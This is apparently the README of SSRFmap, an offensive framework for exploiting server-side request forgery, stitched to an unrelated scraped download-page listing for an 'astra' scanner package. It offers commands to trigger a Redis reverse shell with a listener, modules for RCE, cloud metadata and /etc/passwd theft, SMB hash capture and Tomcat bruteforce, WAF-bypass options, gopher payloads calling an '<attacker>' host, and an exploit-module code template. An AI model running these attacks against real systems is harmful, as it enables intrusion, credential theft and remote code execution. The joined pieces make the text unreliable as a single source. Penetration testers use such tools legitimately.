# SSRFmap [![Python 3.4+](https://img.shields.io/badge/python-3.4+-blue.svg)](https://www.python.org/downloads/release/python-360/) [![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/)
SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
> Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
## Summary
* [Modules](#modules)
* [Install and Manual](#install-and-manual)
* [Examples](#examples)
* [SSRFmap - Tests](#ssrfmap-tests)
* [Contribute](#contribute)
* [Contributors](#thanks-to-the-contributors)
## Modules
The following modules are already implemented and can be used with the `-m` argument.
| Name | Description |
| :------------- | :------------- |
| `fastcgi` | FastCGI RCE |
| `redis` | Redis RCE |
| `github` | Github Enterprise RCE < 2.8.7 |
| `zabbix` | Zabbix RCE |
| `mysql` | MySQL Command execution |
| `docker` | Docker Infoleaks via API |
| `smtp` | SMTP send mail |
| `portscan` | Scan top 8000 ports for the host |
| `networkscan` | HTTP Ping sweep over the network |
| `readfiles` | Read files such as `/etc/passwd` |
| `alibaba` | Read files from the provider (e.g: meta-data, user-data) |
| `aws` | Read files from the provider (e.g: meta-data, user-data) |
| `gce` | Read files from the provider (e.g: meta-data, user-data) |
| `digitalocean` | Read files from the provider (e.g: meta-data, user-data) |
| `socksproxy` | SOCKS4 Proxy |
| `smbhash` | Force an SMB authentication via a UNC Path |
| `tomcat` | Bruteforce attack against Tomcat Manager |
| `custom` | Send custom data to a listening service, e.g: netcat |
| `memcache` | Store data inside the memcache instance |
## Install and Manual
Basic install from the Github repository.
```powershell
$ git clone https://github.com/swisskyrepo/SSRFmap
$ cd SSRFmap/
$ pip3 install -r requirements.txt
$ python3 ssrfmap.py
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
[-v [VERBOSE]] [--lhost LHOST] [--lport LPORT]
[--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
-v [VERBOSE] Enable verbosity
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--uagent USERAGENT User Agent to use
--ssl [SSL] Use HTTPS without verification
--proxy PROXY Use HTTP(s) proxy (ex: http://localhost:8080)
--level [LEVEL] Level of test to perform (1-5, default: 1)
```
## Examples
First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap.
They should look like the following. More examples are available in the **/data** folder.
```powershell
POST /ssrf HTTP/1.1
Host: 127.0.0.1:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mysimple.ssrf/
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Upgrade-Insecure-Requests: 1
url=https%3A%2F%2Fwww.google.fr
```
Use the `-m` followed by module name (separated by a `,` if you want to launch several modules).
```powershell
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
```
If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
```powershell
# Launch a portscan against an HTTPS endpoint using a custom user-agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
```
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
```powershell
# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
```
When the target is protected by a WAF or some filters you can try a wide range of payloads and encoding with the parameter `--level`.
```powershell
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
```
## SSRFmap Tests
A quick way to test the framework can be done with `data/example.py` SSRF service.
```powershell
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
```
## Contribute
I :heart: pull requests :)
Feel free to add any feature listed below or a new service.
- Redis PHP Exploitation
- HTTP module (Jenkins ?)
```powershell
gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
```
The following code is a template if you wish to add a module interacting with a service.
```python
from core.utils import *
import logging
name = "servicename in lowercase"
description = "ServiceName RCE - What does it do"
author = "Name or pseudo of the author"
documentation = ["http://link_to_a_research", "http://another_link"]
class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "4242"
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
# Handle args for reverse shell
if args.lhost == None: self.SERVER_HOST = input("Server Host:")
else: self.SERVER_HOST = args.lhost
if args.lport == None: self.SERVER_PORT = input("Server Port:")
else: self.SERVER_PORT = args.lport
# Data for the service
# Using a generator to create the host list
# Edit the following ip if you need to target something else
gen_host = gen_ip_list("127.0.0.1", args.level)
for ip in gen_host:
port = "6379"
data = "*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
payload = wrapper_gopher(data, ip , port)
# Handle args for reverse shell
payload = payload.replace("SERVER_HOST", self.SERVER_HOST)
payload = payload.replace("SERVER_PORT", self.SERVER_PORT)
# Send the payload
r = requester.do_request(args.param, payload)
```
You can also contribute with a beer IRL or via Github Sponsor button.
### Thanks to the contributors
- [ttffdd](https://github.com/ttffdd)
## Inspired by
- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai](https://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
- [Blog on Gopherus Tool -SpyD3r](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
- [Gopherus - Github](https://github.com/tarunkant/Gopherus)
- [SSRF testing - cujanovic](https://github.com/cujanovic/SSRF-Testing)
没有合适的资源?快使用搜索试试~ 我知道了~
astra 批量扫描工具
共140个文件
py:68个
txt:14个
png:9个
需积分: 5 0 下载量 52 浏览量
2023-07-06
11:02:22
上传
评论
收藏 1.45MB ZIP 举报
温馨提示
astra 批量扫描工具
资源推荐
资源详情
资源评论
收起资源包目录
astra 批量扫描工具 (140个子文件)
____etc_passwd 8KB
____etc_passwd 101B
_etc_hosts 3KB
_etc_hosts 97B
_etc_lsb-release 103B
_etc_passwd 8KB
_etc_passwd 98B
_etc_shadow 98B
_proc_self_cmdline 105B
_proc_self_environ 105B
_proc_self_exe 101B
bootstrap.min.css 118KB
bootstrap-table.min.css 5KB
main.css 5KB
Dockerfile 248B
Dockerfile 232B
.dockerignore 30B
.DS_Store 10KB
.DS_Store 6KB
.DS_Store 6KB
.gitignore 1KB
.gitignore 41B
reports.html 9KB
scan.html 8KB
jquery.min.js 85KB
bootstrap-table.min.js 49KB
bootstrap.min.js 36KB
scan.js 2KB
main.js 118B
Swagger_to_Postman.postman_collection.json 69KB
devcontainer.json 1020B
launch.json 755B
LICENSE 11KB
LICENSE 1KB
README.md 7KB
README.md 5KB
usage.md 3KB
installation.md 2KB
index.md 853B
roadmap.md 325B
credits.md 325B
scan.property.old 683B
_proc_self_cwd_index.php 111B
Detailed-report.png 315KB
readfiles_example_ssrf.png 251KB
report.png 227KB
new scan.png 208KB
networkscan_example_ssrf.png 180KB
Reports.png 164KB
scan-report.png 129KB
astra.png 30KB
tomcat_example_ssrf.png 21KB
ports 41KB
scan.property 722B
config.property 673B
astra.py 16KB
api.py 14KB
vulnerabilities.py 14KB
xss.py 10KB
tomcat.py 7KB
redirect.py 7KB
zapscan.py 7KB
login.py 7KB
csrf.py 6KB
requester.py 6KB
auth.py 6KB
security_headers_missing.py 5KB
sqli.py 5KB
jwt_attack.py 5KB
ssrf.py 4KB
utils.py 4KB
crlf.py 4KB
xxe.py 4KB
mysql.py 4KB
ssrfmap.py 3KB
rate_limit.py 3KB
cors.py 3KB
broken_auth.py 3KB
aws.py 3KB
redis.py 3KB
socksproxy.py 3KB
ssrf.py 2KB
gce.py 2KB
portscan.py 2KB
networkscan.py 2KB
docker.py 2KB
email_cron.py 2KB
digitalocean.py 2KB
github.py 2KB
fastcgi.py 2KB
sendemail.py 2KB
example.py 2KB
alibaba.py 2KB
readfiles.py 2KB
zabbix.py 2KB
parsers.py 2KB
http.py 2KB
httpcollaborator.py 1KB
smtp.py 1KB
zap_config.py 1KB
共 140 条
- 1
- 2
资源评论
smile_@定格
- 粉丝: 1
- 资源: 8
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- update9-20240601.5.205.slice.img.7z.002
- 微信小程序优惠券页面前端模板源码
- 林子雨编著《Spark编程基础(Python版)》 实验7 Spark机器学习库MLib编程实践数据
- 一种支持微信文本限制长度限制使用的,在合适的位置截取限制字节长度的字符串子串的java算法
- MoonPdfLib中解析PDF的库
- 学习Spring-使用Typora进行整理小白可以自学,有什么问题dd我
- update9-20240601.5.205.slice.img.7z.001.pd
- 2030.5 CSIP通信报文参考
- CSIP test程序解读
- POElight流放之路特效优化
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功